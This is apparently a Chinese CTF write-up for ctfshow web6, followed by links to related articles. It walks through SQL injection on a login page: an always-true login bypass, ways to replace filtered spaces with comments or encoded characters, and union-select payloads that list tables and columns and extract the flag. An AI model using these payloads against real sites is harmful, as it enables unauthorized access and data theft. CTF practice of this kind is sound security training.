ctfshow web6

简介: ctfshow web6 WP

题目分析

题目是一个登陆页面,猜测可能是sql注入类的题目

在这里插入图片描述

尝试一下万能密码

username=admin'/**/or/**/1=1#&password=1

在这里插入图片描述

发现有过滤,要找出来是过滤了哪个字符,依次输入验证,发现是过滤了空格

那么就要绕过空格,有以下几种方法

  1. /**/
  2. ()
  3. 回车(url编码中的%0a)
  4. `(tap键上面的按钮)
  5. tap
  6. 两个空格
    详细见下面这篇文章https://blog.csdn.net/weixin_39945475/article/details/109903954

在这里采取/**/代替空格绕过

sql注入流程

爆库

username=admin'/**/union/**/select/**/1,database(),3#&password=1

得到web2数据库

爆表

username=admin'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1

得到 flag user 数据表

爆字段

username=admin'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=1

得到flag字段

爆字段值

username=admin'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/flag#&password=1

得到flag值

在这里插入图片描述

目录
相关文章
|
3月前
|
存储 SQL PHP
Ctfshow web入门 PHP特性篇 web89-web151 全(三)
Ctfshow web入门 PHP特性篇 web89-web151 全(三)
33 2
|
3月前
|
安全 Shell PHP
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
163 0
|
3月前
|
算法 安全 Linux
Ctfshow web入门 PHP特性篇 web89-web151 全(二)
Ctfshow web入门 PHP特性篇 web89-web151 全(二)
77 0
|
3月前
|
存储 SQL 缓存
Ctfshow web入门 PHP特性篇 web89-web151 全(一)
Ctfshow web入门 PHP特性篇 web89-web151 全(一)
89 0
|
3月前
|
JSON JavaScript 前端开发
Ctfshow web入门 nodejs篇 web334-web344
Ctfshow web入门 nodejs篇 web334-web344
54 0
|
3月前
|
前端开发 PHP 开发工具
CTFshow 信息搜集篇 web1-web20
CTFshow 信息搜集篇 web1-web20
27 0
|
3月前
|
PHP
Ctfshow web入门系列 21~28
Ctfshow web入门系列 21~28
36 0
ctfshow---萌新---web9
ctfshow---萌新---web9
|
6月前
|
域名解析 Linux PHP
[CTF]ctfshow web入门
[CTF]ctfshow web入门
|
6月前
|
Linux C语言 C++
【ctfshow】命令执行->web45-57
【ctfshow】命令执行->web45-57
103 0
下一篇
无影云桌面